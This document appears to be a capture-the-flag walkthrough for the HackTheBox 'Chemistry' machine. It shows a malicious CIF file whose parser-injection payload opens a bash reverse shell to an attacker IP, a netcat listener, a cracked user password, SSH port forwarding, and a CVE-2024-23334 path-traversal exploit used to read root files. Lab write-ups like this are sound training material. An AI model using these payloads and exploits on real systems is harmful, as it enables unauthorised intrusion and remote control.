Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Chemistry (HTB – Easy)

The machine exposes a web application that processes CIF files. The parser is vulnerable to Python code execution through crafted CIF metadata. A malicious CIF file provides a reverse shell. Privilege escalation is achieved by port‑forwarding an internal aiohttp service and exploiting a directory traversal vulnerability to read root files.

Overview

Target: 10.10.11.38
Initial vector: Malicious CIF file (RCE)
Privilege escalation: aiohttp path traversal (CVE‑2024‑23334)

Initial Exploitation

The web application accepts CIF uploads. The CIF parser evaluates certain fields unsafely, allowing embedded Python code execution. A payload is inserted into the _space_group_magn.transform_BNS_Pp_abc field.

Example malicious CIF structure:

_space_group_magn.transform_BNS_Pp_abc
'a,b,[d for d in ().__class__.__mro__[1].__getattribute__(
 *[().__class__.__mro__[1]]+["__sub" + "classes__"])()
 if d.__name__ == "BuiltinImporter"][0]
 .load_module("os").system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'");0,0,0'

Upload the file, click the generated link, and the payload executes. A listener on the attacker machine receives the shell: 

$ nc -nlvp 4444

Once inside, database.db contains user hashes. Extracting strings reveals a hash for rosa: 

63ed86ee9f624c7b14f1d4f43dc251a5 -> unicorniosrosados

Switch user:

$ su rosa
Password: unicorniosrosados

Privilege Escalation

Local enumeration shows an internal service on port 8080. 

$ netstat -nat
-> 127.0.0.1:8080

Port‑forward it:

$ ssh rosa@10.10.11.38 -L 8080:127.0.0.1:8080

Accessing http://localhost:8080 reveals an aiohttp application. The version is vulnerable to CVE‑2024‑23334 (path traversal).

Exploit reference:

https://github.com/wizarddos/CVE-2024-23334/blob/master/exploit.py

The correct static directory must be identified (in this case: /assets).

Exploit to read root flag:

$ python3 exploit.py -u http://127.0.0.1:8080 \
  -f /root/root.txt -d /assets

The response contains the root flag.

Conclusion

The machine relies on insecure CIF parsing to achieve initial RCE. After pivoting to the rosa user, an internal aiohttp service is exposed and exploited using a directory traversal vulnerability. The final exploit retrieves /root/root.txt directly.